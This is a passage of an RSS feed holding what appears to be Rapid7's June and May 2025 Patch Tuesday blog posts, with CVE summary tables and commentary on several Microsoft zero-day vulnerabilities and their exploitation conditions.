src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt113025f2f9328d03/6849810e209a6a0675fcf7bb/blog-patch-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-patch-3.png" asset-alt="blog-patch-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt113025f2f9328d03/6849810e209a6a0675fcf7bb/blog-patch-3.png" data-sys-asset-uid="blt113025f2f9328d03" data-sys-asset-filename="blog-patch-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-patch-3.png" sys-style-type="display"/></p><h2>Summary tables</h2><h3>Azure vulnerabilities</h3><table><thead><tr><th style="text-align: left;"><p>CVE</p></th><th style="text-align: left;"><p>Title</p></th><th style="text-align: left;"><p>Exploited?</p></th><th style="text-align: left;"><p>Publicly disclosed?</p></th><th style="text-align: left;"><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47977">CVE-2025-47977</a></td><td><p>Nuance Digital Engagement Platform Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.6</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-5419">CVE-2025-5419</a></td><td><p>Chromium: CVE-2025-5419 Out of bounds read and write in V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-5068">CVE-2025-5068</a></td><td><p>Chromium: CVE-2025-5068 Use after free in Blink</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47962">CVE-2025-47962</a></td><td><p>Windows SDK Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30399">CVE-2025-30399</a></td><td><p>.NET and Visual Studio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47959">CVE-2025-47959</a></td><td><p>Visual Studio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47966">CVE-2025-47966</a></td><td><p>Power Automate Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47172">CVE-2025-47172</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47163">CVE-2025-47163</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47166">CVE-2025-47166</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47957">CVE-2025-47957</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47162">CVE-2025-47162</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47953">CVE-2025-47953</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47164">CVE-2025-47164</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47167">CVE-2025-47167</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47168">CVE-2025-47168</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47169">CVE-2025-47169</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47170">CVE-2025-47170</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47175">CVE-2025-47175</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47176">CVE-2025-47176</a></td><td><p>Microsoft Outlook Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47173">CVE-2025-47173</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47165">CVE-2025-47165</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47174">CVE-2025-47174</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47968">CVE-2025-47968</a></td><td><p>Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47171">CVE-2025-47171</a></td><td><p>Microsoft Outlook Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33067">CVE-2025-33067</a></td><td><p>Windows Task Scheduler Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29828">CVE-2025-29828</a></td><td><p>Windows Schannel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32725">CVE-2025-32725</a></td><td><p>DHCP Server Service Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33050">CVE-2025-33050</a></td><td><p>DHCP Server Service Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32721">CVE-2025-32721</a></td><td><p>Windows Recovery Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32719">CVE-2025-32719</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33058">CVE-2025-33058</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33059">CVE-2025-33059</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33061">CVE-2025-33061</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33062">CVE-2025-33062</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33063">CVE-2025-33063</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33065">CVE-2025-33065</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24068">CVE-2025-24068</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24069">CVE-2025-24069</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24065">CVE-2025-24065</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33055">CVE-2025-33055</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47956">CVE-2025-47956</a></td><td><p>Windows Security App Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33052">CVE-2025-33052</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33069">CVE-2025-33069</a></td><td><p>Windows App Control for Business Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47969">CVE-2025-47969</a></td><td><p>Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.4</p></td></tr></tbody></table><h3>Windows ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33073">CVE-2025-33073</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33064">CVE-2025-33064</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33066">CVE-2025-33066</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33053">CVE-2025-33053</a></td><td><p>Web Distributed Authoring and Versioning (WEBDAV) Remote Code Execution Vulnerability</p></td><td><p>Yes</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32710">CVE-2025-32710</a></td><td><p>Windows Remote Desktop Services Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33070">CVE-2025-33070</a></td><td><p>Windows Netlogon Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33071">CVE-2025-33071</a></td><td><p>Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32718">CVE-2025-32718</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47955">CVE-2025-47955</a></td><td><p>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32716">CVE-2025-32716</a></td><td><p>Windows Media Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32714">CVE-2025-32714</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33075">CVE-2025-33075</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32713">CVE-2025-32713</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32712">CVE-2025-32712</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33068">CVE-2025-33068</a></td><td><p>Windows Standards-Based Storage Management Service Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33056">CVE-2025-33056</a></td><td><p>Windows Local Security Authority (LSA) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32724">CVE-2025-32724</a></td><td><p>Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-3052">CVE-2025-3052</a></td><td><p>Cert CC: CVE-2025-3052 InsydeH2O Secure Boot Bypass</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33057">CVE-2025-33057</a></td><td><p>Windows Local Security Authority (LSA) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32715">CVE-2025-32715</a></td><td><p>Remote Desktop Protocol Client Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32722">CVE-2025-32722</a></td><td><p>Windows Storage Port Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32720">CVE-2025-32720</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33060">CVE-2025-33060</a></td><td><p>Windows Storage Management Provider Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47160">CVE-2025-47160</a></td><td><p>Windows Shortcut Files Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.4</p></td></tr></tbody></table><br/>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025</link>
      <guid isPermaLink="false">blt1daa779cbd3a3e4a</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 10 Jun 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - May 2025]]></title>
      <description><![CDATA[<p>Microsoft is addressing 77 vulnerabilities this <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-May">May 2025 Patch Tuesday</a>. Microsoft has evidence of in-the-wild exploitation for five of the vulnerabilities published today, and these are already reflected in <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV</a>. Separately, Microsoft is aware of existing public disclosure for two vulnerabilities published today. This is now the eighth consecutive Patch Tuesday on which Microsoft has published zero-day vulnerabilities without evaluating any of them as critical severity at time of publication. Today also sees the publication of six critical remote code execution (RCE) vulnerabilities. Six browser vulnerabilities have already been published separately this month, and are not included in the total.</p><h2>Windows Scripting Engine: zero-day RCE</h2><p>In the majority of cases, the CVSSv3 base score provides a solid sense of the severity of a vulnerability. Sometimes, however, even a correct CVSS assessment can disguise the potential impact of a specific vulnerability. This is arguably the case with <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-30397">CVE-2025-30397</a>, a zero-day RCE vulnerability in the Windows Scripting Engine with a healthy but unremarkable CVSSv3 base score of 7.5. Microsoft is aware of exploitation in the wild. It’s certainly not the worst of the worst — we save that level of alarm for pre-authentication RCE with no requirement for user interaction —  and Microsoft very reasonably assesses attack complexity as high. And yet…</p><p>The advisory FAQ for <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-30397">CVE-2025-30397</a> explains that successful exploitation requires an attacker to first prepare the target so that it uses Edge in Internet Explorer Mode, and then causes the user to click a malicious link; there is no mention of a requirement for the user to actively reload the page in Internet Explorer Mode, so we must assume that exploitation requires only that the “<a href="https://support.microsoft.com/en-us/microsoft-edge/internet-explorer-mode-in-microsoft-edge-6604162f-e38a-48b2-acd2-682dbac6f0de">Allow sites to be reloaded in Internet Explorer</a>” option is enabled. Users who are most likely to require Internet Explorer compatibility mode in 2025 are surely users at enterprise organizations, where critical business workflows still depend on applications from the dinosaur days when Internet Explorer ruled the roost. No doubt the concept of a plan for migration of all of these applications exists, buried several layers deep in a dusty backlog, but Microsoft would hardly be <a href="https://learn.microsoft.com/en-us/lifecycle/faq/internet-explorer-microsoft-edge#what-is-the-lifecycle-policy-for-internet-explorer-">offering IE compatibility mode</a> until <em>at least</em> 2029 if it didn’t know that a huge swathe of its customer base demands it.</p><p>If the pre-requisite conditions are already conveniently in place on the target asset thanks to a well-meaning corporate IT policy, attack complexity is suddenly nice and low. If this vulnerability didn’t have that requirement for environment preparation, the CVSS base score would then be 8.8, which is as close to critical as you can get without actually stepping over the line. As Rapid7 has <a href="/blog/post/2024/11/12/patch-tuesday-november-2024/#mshtml-zero-day-ntlmv2-hash-disclosure">previously noted</a> on a number of occasions, the MSHTML/Trident scripting engine is still present in Windows; this is true even for assets which have only ever run versions of Windows released well after the end of support for Internet Explorer 11 back in June 2022.</p><h2>Common Log File System: zero-day EoPs</h2><p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32701">CVE-2025-32701</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32706">CVE-2025-32706</a> are far from the first zero-day vulnerabilities in the Windows Common Log File System (CLFS) driver; indeed, they are the latest members of an <a href="/blog/post/2024/12/10/patch-tuesday-december-2024/">ongoing</a> <a href="/blog/post/2025/04/08/patch-tuesday-april-2025/#clfs-zero-day-eop">dynasty</a> where exploitation typically leads to elevation of privilege to SYSTEM. Credit where credit is due: recent disclosures by Microsoft’s own Threat Intelligence Center (MSTIC), including this month’s <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32701">CVE-2025-32701</a>, demonstrate that Microsoft is putting serious effort into detecting and rooting out CLFS exploitation. Of course, since Microsoft is aware of exploitation in the wild, we know that someone else got there first, and there’s no reason to suspect that threat actors will stop looking for ways to abuse CLFS any time soon.</p><h2>Windows Desktop Window Manager: zero-day EoP</h2><p>If proof were needed that elevation of privilege to SYSTEM will never go out of style, today sees the publication of <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-30400">CVE-2025-30400</a>, which is a zero-day vulnerability in the Windows Desktop Window Manager (DWM). As it happens, tomorrow marks the <a href="/blog/post/2024/05/14/patch-tuesday-may-2024/">one-year anniversary</a> of <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-30051">CVE-2024-30051</a>, a previous zero-day EoP vulnerability in DWM.</p><h2>Visual Studio: zero-day RCE</h2><p>Today, all current versions of Visual Studio 2022 and 2019 receive patches for <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32702">CVE-2025-32702</a>, a zero-day RCE where exploitation requires the user to download and open a malicious file. There is nothing obviously remarkable about this, although Microsoft is aware of public disclosure. As usual for a malicious file/link vuln, the word Remote here refers to the location of the attacker, even though exploitation is set in motion by local user action.</p><h2>Ancillary Function Driver for Winsock: zero-day EoP</h2><p>Regular Patch Tuesday watchers will <a href="/blog/post/2025/02/11/microsoft-patch-tuesday/">recognize the Ancillary Function Driver for Winsock</a>, which is the site of <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-32709">CVE-2025-32709</a>, an elevation of privilege vulnerability for which Microsoft is aware of exploitation. In something of a break with tradition for Patch Tuesday zero-day EoP vulnerabilities, exploitation only leads to administrator privileges rather than all the way to SYSTEM, but no attacker is going to waste too many cycles feeling sad about that.</p><h2>Defender for Identity: situationally-ironic zero-day spoofing</h2><p>Today sees the publication of <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26685">CVE-2025-26685</a>, a zero-day spoofing vulnerability in Microsoft Defender for Identity. The advisory provides puzzle pieces which don’t by themselves add up to anything like a full explanation of the vulnerability; no action is required for remediation, but you can render yourself vulnerable if you insist by opening a case with Microsoft Support to re-enable the legacy NTLM authentication method.</p><p>However, the FAQ does offer a link to an article published yesterday: <a href="https://learn.microsoft.com/en-us/defender-for-identity/deploy/remote-calls-sam">Configure SAM-R to enable lateral movement path detection in Microsoft Defender for Identity</a>. This solid piece of documentation is part of the overall Defender for Identity administration guide, and explains that the lateral movement path detection feature can itself potentially be exploited by an adversary to obtain an NTLM hash.</p><p>Exploitation relies on achieving fallback from Kerberos to NTLM; the compromised credentials in this case would be those of the Directory Service Account for Defender for Identity. The new Defender for Identity sensor (version 3.x) is not affected by this issue as it uses different detection methods; at time of writing, the <a href="https://learn.microsoft.com/en-us/defender-for-identity/whats-new">Defender for Identity What’s new? page</a> doesn’t yet describe the 3.x release, but this will presumably receive an update soon.</p><h2>Microsoft lifecycle update</h2><p>The next batch of significant Microsoft product lifecycle status changes are due in July 2025, when SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.</p><h2>Summary charts</h2><img src="/content/images/2025/05/image.png" alt="A bar chart showing the distribution of vulnerabilities by affected component for Microsoft Patch Tuesday May 2025" width="auto" style="width: auto; height: auto;" /><img src="/content/images/2025/05/image-1.png" alt="A bar chart showing the distribution of vulnerabilities by impact for Microsoft Patch Tuesday May 2025" width="auto" style="width: auto; height: auto;" /><img src="/content/images/2025/05/image-2.png" alt="A heatmap showing the distribution of vulnerabilities by impact and affected component for Microsoft Patch Tuesday May 2025" width="auto" style="width: auto; height: auto;" /><h2>Summary tables</h2><h3>Apps vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29975">CVE-2025-29975</a></td><td>Microsoft PC Manager Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr></tbody></table><h3>Azure vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29972">CVE-2025-29972</a></td><td>Azure Storage Resource Provider Spoofing Vulnerability</td><td>No</td><td>No</td><td>9.9</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29827">CVE-2025-29827</a></td><td>Azure Automation Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>9.9</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30387">CVE-2025-30387</a></td><td>Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>9.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47733">CVE-2025-47733</a></td><td>Microsoft Power Apps Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>9.1</td></tr><tr><td><a target="_blank" 